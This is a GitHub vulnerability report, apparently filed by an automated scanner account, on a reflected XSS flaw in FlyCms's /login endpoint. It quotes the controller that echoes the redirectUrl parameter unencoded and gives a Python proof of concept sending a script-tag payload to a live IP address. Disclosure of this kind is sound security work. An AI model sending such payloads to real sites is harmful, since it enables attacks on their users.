FlyCms icon indicating copy to clipboard operation
FlyCms copied to clipboard
verified publisher icon sunkaifei

XSS - /login

Open NinjaGPT opened this issue 1 month ago • 0 comments

Summary

In the latest version, the endpoint /login does not encode user-controllable parameters when outputting them on the current page, resulting in Reflected XSS. This allows attackers to launch XSS attacks against users.

Details

  • Taint SINK & SOURCE
// src/main/java/com/flycms/web/front/UserController.java#L127-L136
127:    @GetMapping({"/login"})
128:    public String userLogin(@RequestParam(value = "redirectUrl",required = false) String redirectUrl, ModelMap modelMap) {
129:       if (this.getUser() != null) {
130:          return "redirect:/index";
131:       } else {
132:          modelMap.addAttribute("redirectUrl", redirectUrl);
133:          return this.theme.getPcTemplate("user/login");
134:       }
135:    }
136:

POC

import requests
from requests.sessions import Session
class CustomSession(Session):
    def request(
        self,
        method,
        url,
        params = None,
        data = None,
        headers = None,
        cookies = None,
        files = None,
        auth = None,
        timeout = None,
        allow_redirects = True,
        proxies = None,
        hooks = None,
        stream = None,
        verify = None,
        cert = None,
        json = None,
    ):
        arg_names = (
            'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout',
            'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json'
        )
        local_variables = locals()
        local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
        
        local_variables['headers'] = local_variables.get('headers') or dict()
        local_variables['headers'].update({'cookie': 'JSESSIONID=node0tkgiu6r21b401cgywf0h1p7rr19.node0; Hm_lvt_2f24154b3f87697d36a4e2a638b68aaa=1764060845; HMACCOUNT=FB72DC4D7D883C26; Hm_lpvt_2f24154b3f87697d36a4e2a638b68aaa=1764060922', 'pragma': 'no-cache', 'sec-ch-ua': '"Google Chrome";v="137", "Chromium";v="137", "Not/A)Brand";v="24"', 'User-Agent': 'oxpecker', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate', 'accept-language': 'en-US', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Linux"', 'upgrade-insecure-requests': '1'})
        return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
url = 'http://35.233.133.2:41653/login'
malicious_payload = '"><ScRiPT>alert("zast-xss")</SCript>//'
params = {'redirectUrl': malicious_payload}
response = requests.get(url, params=params, verify=False, allow_redirects=False)
print('Status Code:', response.status_code)
print('Text:', response.text)
# =================================== Poc End ====================================
Image

NinjaGPT avatar Dec 08 '25 07:12 NinjaGPT